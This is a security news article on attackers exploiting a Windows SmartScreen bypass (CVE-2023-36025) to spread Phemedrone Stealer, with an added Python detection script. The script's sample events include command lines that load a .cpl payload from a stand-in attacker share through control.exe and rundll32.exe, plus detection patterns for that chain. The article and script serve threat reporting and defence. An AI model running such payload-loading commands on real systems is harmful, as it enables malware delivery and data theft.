Threat actors have been observed leveraging a now-patched security flaw in Microsoft Windows to deploy an open-source information stealer called Phemedrone Stealer.
“Phemedrone targets web browsers and data from cryptocurrency wallets and messaging apps such as Telegram, Steam, and Discord,” Trend Micro researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun said.
“It also takes screenshots and gathers system information regarding hardware, location, and operating system details. The stolen data is then sent to the attackers via Telegram or their command-and-control (C&C) server.”
The attacks leverage CVE-2023-36025 (CVSS score: 8.8), a security bypass vulnerability in Windows SmartScreen that could be exploited by tricking a user into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file.
The actively exploited shortcoming was addressed by Microsoft as part of its November 2023 Patch Tuesday updates.
The infection procedure involves the threat actor hosting malicious Internet Shortcut files on Discord or cloud services like FileTransfer.io, with the links also masked using URL shorteners such as Short URL.
The execution of the booby-trapped .URL file allows it to connect to an actor-controlled server and execute a Control Panel (.CPL) file in a manner that circumvents Windows Defender SmartScreen by taking advantage of CVE-2023-36025.
“When the malicious .CPL file is executed through the Windows Control Panel process binary, it in turn calls rundll32.exe to execute the DLL,” the researchers said. “This malicious DLL acts as a loader that then calls on Windows PowerShell to download and execute the next stage of the attack, hosted on GitHub.”
The follow-on payload is a PowerShell loader (“DATA3.txt”) that acts as a launchpad for Donut, an open-source shellcode loader that decrypts and executes Phemedrone Stealer.
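As an added illustration (not code from the article or from the Trend Micro report) of how a defender could hunt for the process chain described above, the following Python script checks constructed process-creation events for control.exe loading a .CPL from a remote path and for PowerShell whose parentage runs back through rundll32.exe to control.exe; the host name, paths and command lines are placeholders.

```python
import ntpath

# Constructed process-creation events (not telemetry from the report). They mimic the
# chain the article describes: control.exe launched with a remote .CPL, spawning
# rundll32.exe, which in turn spawns PowerShell. Hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\control.exe",
     "cmd": r"control.exe \\ATTACKER_HOST\share\payload.cpl"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL \\ATTACKER_HOST\share\payload.cpl"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -c <redacted>"},
    # Benign noise: a user opens Control Panel, an admin starts PowerShell from Explorer.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\control.exe", "cmd": "control.exe"},
    {"pid": 600, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmd": "powershell.exe"},
]

# Child-first lineage we expect for the final PowerShell stage.
SUSPICIOUS_LINEAGE = ["powershell.exe", "rundll32.exe", "control.exe"]

def _name(event):
    return ntpath.basename(event["image"]).lower()

def _ancestry(event, by_pid):
    """Process names from this event up to the root (child first); cycle-safe."""
    names, cur, seen = [], event, set()
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        names.append(_name(cur))
        cur = by_pid.get(cur["ppid"])
    return names

def remote_cpl_launch(event):
    """control.exe asked to load a .cpl from a UNC share or URL instead of a local file."""
    cmd = event["cmd"].lower()
    return _name(event) == "control.exe" and ".cpl" in cmd and ("\\\\" in cmd or "://" in cmd)

def find_suspicious(events):
    """Return (pid, reason) pairs for events matching the chain in the article."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if remote_cpl_launch(e):
            alerts.append((e["pid"], "control.exe loading remote .cpl"))
        if _name(e) == "powershell.exe" and _ancestry(e, by_pid)[:3] == SUSPICIOUS_LINEAGE:
            alerts.append((e["pid"], "powershell spawned via control.exe -> rundll32.exe"))
    return alerts
```

On the sample events only pids 200 and 400 are flagged; the benign Control Panel and PowerShell launches are not.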
Written in C#, Phemedrone Stealer is actively maintained by its developers on GitHub and Telegram, facilitating the theft of sensitive data from compromised systems.
The development is once again a sign that threat actors are becoming increasingly flexible and quickly adapting their attack chains to capitalize on newly disclosed exploits and inflict maximum damage.
“Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a myriad of malware types, including ransomware and stealers like Phemedrone Stealer,” the researchers said.